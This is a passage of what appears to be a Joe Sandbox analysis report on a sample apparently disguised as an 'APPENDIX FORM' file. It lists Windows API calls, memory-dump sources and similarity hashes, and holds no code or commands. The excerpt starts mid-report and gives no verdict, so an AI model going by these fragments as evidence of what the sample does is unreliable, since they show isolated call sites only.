                                                                                                               • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7 (0x423 = WM_USER+0x23, TB_GETTOOLTIPS when the target window is a toolbar control)
                                                                                                               • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1 (uFlag 0 = MF_BYCOMMAND, so 0x103 is a menu command ID; cchMax 0x4F)
                                                                                                               • GetKeyState.USER32(00000010), ref: 0041210D (0x10 = VK_SHIFT)
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3550944819-0
                                                                                                              • Opcode ID: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                              • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                              • Opcode Fuzzy Hash: e484aa313eeb80bd7472f2401a4c50dedc9a7c38d875d1deba0becea129ff557
                                                                                                              • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                              APIs
                                                                                                              • free.MSVCRT ref: 0040F561
                                                                                                              • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                               • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$free
                                                                                                              • String ID: g4@
                                                                                                              • API String ID: 2888793982-2133833424
                                                                                                              • Opcode ID: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                              • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                              • Opcode Fuzzy Hash: e202219f899f6405cf9ccc08ea0a2323c377b0568c486578cbaaf15be4e6d242
                                                                                                              • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
APIs
• memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
• memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
• memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memcpy
• String ID: @
• API String ID: 3510742995-2766056989
• Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
• Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
• Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
• Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
APIs
• ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF07
• memset.MSVCRT ref: 0040AF18
• memcpy.MSVCRT(0045A474,?,00000000,00000000,00000000,00000000,00000000,?,?,00401516,?,?,?,?,00457660,0000000C), ref: 0040AF24
• ??3@YAXPAX@Z.MSVCRT ref: 0040AF31
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
• Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
• Opcode Fuzzy Hash: ae038b71f9c71a492fbd9ead760fad2983a0a3722d1a889603b093681f778c61
• Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
APIs
• memset.MSVCRT ref: 004144E7
  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
• WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
• memset.MSVCRT ref: 0041451A
• GetPrivateProfileStringW.KERNEL32(?,?,Function_0004E518,?,00002000,?), ref: 0041453C
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
• String ID:
• API String ID: 1127616056-0
• Opcode ID: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
• Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
• Opcode Fuzzy Hash: 914c831d0af6f6b5d0e69cc874d3cd2e27131541a502a72cc4fac318c133dcf3
• Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
APIs
• memcpy.MSVCRT(?,?,00000068,sqlite_master), ref: 0042FEC6
• memset.MSVCRT ref: 0042FED3
• memcpy.MSVCRT(?,?,00000068,?,?,?,00000000,?,?,?,?,?,?,?,sqlite_master), ref: 0042FF04
Strings
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memcpy$memset
• String ID: sqlite_master
• API String ID: 438689982-3163232059
• Opcode ID: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
• Instruction ID: 9056235088afc86d32383ab843763c359d37acea7f1aa245e41bfa901f9896ac
• Opcode Fuzzy Hash: ffda2190085ae9c3ce841de5d9405e2beeaf844ff5ba4b6923ab4bebb0b5ba17
• Instruction Fuzzy Hash: 9401C872D006047BDB11AFB19C42FDEBB7CEF05318F51452BFA0461182E73A97248795
APIs
• SHGetMalloc.SHELL32(?), ref: 00414D9A
• SHBrowseForFolderW.SHELL32(?), ref: 00414DCC
• SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00414DE0
• wcscpy.MSVCRT ref: 00414DF3
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: BrowseFolderFromListMallocPathwcscpy
• String ID:
• API String ID: 3917621476-0
• Opcode ID: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
• Instruction ID: 3f0f02420fde520a26c7535fd1ed00e0b1d7e8cc8ebd586967f5863715f62e8c
• Opcode Fuzzy Hash: e1f0fba32f57733aa2e62750ac03032e5e1fd264973d7f61484481ae59376fd7
• Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
APIs
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
• _snwprintf.MSVCRT ref: 00410FE1
• SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
• _snwprintf.MSVCRT ref: 0041100C
• wcscat.MSVCRT ref: 0041101F
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
• String ID:
• API String ID: 822687973-0
• Opcode ID: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
• Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
• Opcode Fuzzy Hash: 13244a37e27c3892f350f60725bb78b4c5ec5d087451c120d8dd0baf8caf14ec
• Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
APIs
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,771ADF80,?,0041755F,?), ref: 00417452
• malloc.MSVCRT ref: 00417459
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,771ADF80,?,0041755F,?), ref: 00417478
• free.MSVCRT ref: 0041747F
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
• API String ID: 2605342592-0
• Opcode ID: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
• Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
• Opcode Fuzzy Hash: 393c83f8647a4e4e905b151b9ea1406947fc62e9018515f0e7f821d7fee9a8df
• Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000000), ref: 00412403
• RegisterClassW.USER32(00000001), ref: 00412428
• GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
• CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000,?), ref: 00412455
Memory Dump Source
• Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: HandleModule$ClassCreateRegisterWindow
• String ID:
• API String ID: 2678498856-0
• Opcode ID: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
• Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
• Opcode Fuzzy Hash: 3d8581704458cf3d0e12cdde0886d81e04a6e1a5031830fe2d02856e91d8c1e2
• Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                              • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                              • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                              • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Item
                                                                                                              • String ID:
                                                                                                              • API String ID: 3888421826-0
                                                                                                              • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                              • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                              • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                              • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00417B7B
                                                                                                              • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                              • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                              • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: File$ErrorLastLockUnlockmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 3727323765-0
                                                                                                              • Opcode ID: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                              • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                              • Opcode Fuzzy Hash: 660d6347da47db4c597c862521096cecacc5d04f8920089305201e8d5f0c2e75
                                                                                                              • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040F673
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,00007FFF,00000000,00000000,00000000), ref: 0040F690
                                                                                                              • strlen.MSVCRT ref: 0040F6A2
                                                                                                              • WriteFile.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 0040F6B3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2754987064-0
                                                                                                              • Opcode ID: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                              • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                              • Opcode Fuzzy Hash: 2d99b823047ec0f3cd03764c07ddb7da79dd9e7c990c2a315c49f172e64051b9
                                                                                                              • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 0040F6E2
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000001,000000FF,?,00001FFF,00000000,00000000,00000001,0044E5FC,00000000,00000000,00000000,?,00000000,00000000), ref: 0040F6FB
                                                                                                              • strlen.MSVCRT ref: 0040F70D
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040F71E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2754987064-0
                                                                                                              • Opcode ID: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                              • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                              • Opcode Fuzzy Hash: 78dfd465d09002bf9bae10831117093d85a4e6860472b193aca7c856fde4830d
                                                                                                              • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 00402FD7
                                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                              • strlen.MSVCRT ref: 00403006
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                              • String ID:
                                                                                                              • API String ID: 2754987064-0
                                                                                                              • Opcode ID: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                              • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                              • Opcode Fuzzy Hash: 45553c8af4b0363f8a34df7fc8c3d36c1e5ddbe80f4e11049bb1cff45e3a7899
                                                                                                              • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                              APIs
                                                                                                                • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                              • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                              • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 764393265-0
                                                                                                              • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                              • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                              • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                              • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                              APIs
                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Time$System$File$LocalSpecific
                                                                                                              • String ID:
                                                                                                              • API String ID: 979780441-0
                                                                                                              • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                              • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                              • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                              • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                                                              • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                                                              • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$DialogHandleModuleParam
                                                                                                              • String ID:
                                                                                                              • API String ID: 1386444988-0
                                                                                                              • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                              • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                                                              • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                                                              • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                                                              APIs
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00940048), ref: 0044DF01
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00A572C0), ref: 0044DF11
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00A57AD0), ref: 0044DF21
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00A576C8), ref: 0044DF31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
